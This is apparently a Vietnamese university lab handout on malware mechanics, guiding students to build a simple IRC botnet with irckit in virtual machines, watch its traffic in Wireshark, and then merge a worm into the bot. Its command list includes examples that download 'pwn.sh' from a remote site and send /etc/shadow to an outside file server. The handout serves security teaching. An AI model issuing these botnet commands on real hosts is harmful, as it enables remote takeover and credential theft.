3

Lab

Simple Botnet

Thực hành Cơ chế hoạt động của Mã độc

Lưu hành nội bộ 2024

<Không được phép đăng tải trên internet dưới mọi hình thức>

A. TỔNG QUAN

A.1 Muc tiêu

- Tìm hiểu cơ chế hoạt động của Botnet
- Giả lập mạng Botnet để thực nghiệm
- Tích hợp Simple Worm vào Bot

A.2 Thời gian thực hành

- Tại lớp 5 tiết.
- Tại nhà 7 ngày.

B. CHUẨN BI MÔI TRƯỜNG

- 2 máy Ubuntu Server 16.04 (một máy đóng vai trò máy chủ, một máy đóng vai trò client để khai thác lỗ hổng trên máy chủ)
- 1 máy Windows để chạy ứng dụng mIRC client.
- Cài đặt những gói ứng dụng hỗ trợ trong quá trình thực thi (lưu ý chạy với quyền root):
 - Update hệ điều hành Ununtu

```
sudo apt-get update
```

Cài đặt pip cho python2.7

```
wget <a href="https://bootstrap.pypa.io/pip/2.7/get-pip.py">https://bootstrap.pypa.io/pip/2.7/get-pip.py</a>
sudo python get-pip.py
```

Cài đặt những thư viện cần thiết:

```
sudo apt-get install libevent-dev
sudo apt-get install python-all-dev
sudo pip install irckit
sudo pip install greenlet
sudo pip install gevent
```

C. THỰC HÀNH

C.1 Giả lập mạng Botnet

- 1. Lấy mã nguồn được cấp và đọc thật kĩ nội dung trong tập tin irckit.pdf để nắm cơ chế hoạt động, biên dịch và thử nghiệm mạng botnet.
- 2. Sao chép mã nguồn lên 2 máy ảo.
- 3. Tai máy server:
 - Khởi động chương trình Wireshark để theo dõi quá trình kết nối của botmaster với irc.freenode.net.
 - Chạy dòng lệnh sau:

```
python boss.py -c secretbotz -n daboss1 -x qwerty
```

- o python: từ khóa để thực thi file python
- o boss.py : file cần thực thi
- o -c <channel-name> : đăng ký một command channel mới
- o -n <nick-name> : nick name của boss trên channel
- o -x <secret>: secret để chứng thực boss trên channel

Yêu cầu 1 Từ kết quả wireshark thu thập được. Hãy phân tích quá trình gì đang diễn ra.

4. Tai máy client, chay dòng lệnh sau:

python worker.py -b daboss1

Yêu cầu 2 Từ kết quả wireshark thu thập được. Hãy phân tích quá trình gì đang diễn ra.

5. Sử dụng *IRC Client* để kết nối tới Server và thực hiện các command bên dưới: run run run program> Run the given program on the worker's host.

Example: !execute run vmstat

info Get info about the host the worker is running on

Example: !execute info

download <url> Retrieve a remote file and store it in the working directory

Example: !execute download http://my-awesome-script.com/pwn.sh

send_file <filename> <destination> Send file at <filename> to given destination (host:port) - this
transers the raw data.

Example: !execute send_file /etc/shadow some.fileserver.com:9001

ports View what ports are open on the workers host

Example: !execute ports

status Return the workers queue size
Example: !execute status

 ${\tt get_time}$ ${\tt <format>}$ Return the local time from the workers host

Example: !execute get_time

Yêu cầu 3 Báo cáo kết quả chạy command IRC client.

C.2 Mở rộng mạng botnet với 2 bots

Yêu cầu 4 Tiếp tục những gì đang thực hiện tại C.1, bạn hãy mở rộng mạng Botnet với 2 bots.

C.3 Tích hợp Simple Worm với Bot

Yêu cầu 5 Với những kiến thức về Simple Worm đã làm và Botnet vừa làm. Bạn hãy tích hợp Simple Worm vào Bot để ngoài việc thực hiện command từ xa còn có thể khai thác được lỗ hổng của máy từ xa.

D. YÊU CÂU

- Sinh viên tìm hiểu và thực hành theo hướng dẫn theo nhóm đã sắp xếp.
- Báo cáo kết quả chi tiết những việc (**Report**) đã thực hiện, quan sát thấy và kèm ảnh chụp màn hình kết quả (nếu có); giải thích cho quan sát (nếu có), video demo (điểm cộng) đăng tải Youtube với chế độ unlisted.

Báo cáo:

- Làm báo cáo trên file mẫu.
- File **.PDF**. Tập trung vào nội dung, không mô tả lý thuyết.
- Trong file báo cáo yêu cầu ghi rõ nhóm sinh viên thực hiện.
- Đặt tên theo định dạng: [Mã lớp]-Lab1_MSSV1-MSSV2.pdf
 Ví dụ: [NT330.K21.ANTN.1]-Lab2_1552xxxx-1552yyyy.pdf
- Nếu báo cáo có nhiều file, nén tất cả file vào file .ZIP với cùng tên file báo cáo.
- Nộp file báo cáo trên theo thời gian đã thống nhất tại courses.uit.edu.vn.

Đánh giá: Sinh viên hiểu và tự thực hiện được bài thực hành. Khuyến khích:

- Chuẩn bị tốt và đóng góp tích cực tại lớp.
- Có nội dung mở rộng, ứng dụng trong kịch bản phức tạp hơn, có đóng góp xây dựng bài thực hành.

Bài sao chép, trễ,... sẽ được xử lý tùy mức đô vi pham.

-HÉT-